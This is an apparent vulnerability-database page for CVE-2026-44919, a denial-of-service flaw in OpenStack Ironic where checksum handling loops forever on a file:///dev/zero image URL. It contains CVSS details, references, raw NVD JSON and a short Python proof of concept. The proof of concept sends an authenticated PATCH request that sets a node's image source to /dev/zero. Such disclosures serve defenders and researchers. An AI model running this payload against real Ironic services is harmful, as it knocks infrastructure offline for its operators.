Security Vulnerability Report
CVE-2026-44919 CVSS 4.3 MEDIUM

CVE-2026-44919

Published: 2026-05-14 02:17:22
Last Modified: 2026-05-14 18:30:57

Description

In OpenStack Ironic through 35.x before a3f6d73, during image handling, an infinite loop in checksum calculations can occur via the file:///dev/zero URL.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

OpenStack Ironic <= 35.x (before commit a3f6d73)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual Proof of Concept for CVE-2026-44919
# This demonstrates how a malicious image URL could trigger the infinite loop.
import requests

# Target Ironic API endpoint
ironic_api_url = "http://target-ironic-api:6385/v1/nodes"
node_id = "<TARGET_NODE_UUID>"
auth_token = "<VALID_AUTH_TOKEN>"

# Malicious configuration pointing to /dev/zero
# This causes the checksum calculation to loop infinitely.
payload = {
    "instance_info": {
        "image_source": "file:///dev/zero",
        "image_checksum": "http://example.com/fake_checksum"
    }
}

headers = {
    "Content-Type": "application/json",
    "X-Auth-Token": auth_token
}

try:
    # Send request to update node with malicious image URL
    response = requests.patch(
        f"{ironic_api_url}/{node_id}",
        json=payload,
        headers=headers
    )
    print(f"Request sent with status code: {response.status_code}")
    print("If successful, the Ironic conductor will enter an infinite loop during checksum validation.")
except Exception as e:
    print(f"Error occurred: {e}")
```

References

https://bugs.launchpad.net/ironic/+bug/2150332 (Launchpad bug report)
https://opendev.org/openstack/ironic/commit/a3f6d735ac3642ab95b49142c7305f072ae748d0 (fix commit a3f6d73)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44919",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T02:17:21.773",
    "lastModified": "2026-05-14T18:30:57.103",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In OpenStack Ironic through 35.x before a3f6d73, during image handling, an infinite loop in checksum calculations can occur via the file:///dev/zero URL."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-696"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://bugs.launchpad.net/ironic/+bug/2150332",
        "source": "[email protected]"
      },
      {
        "url": "https://opendev.org/openstack/ironic/commit/a3f6d735ac3642ab95b49142c7305f072ae748d0",
        "source": "[email protected]"
      },
      {
        "url": "https://bugs.launchpad.net/ironic/+bug/2150332",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```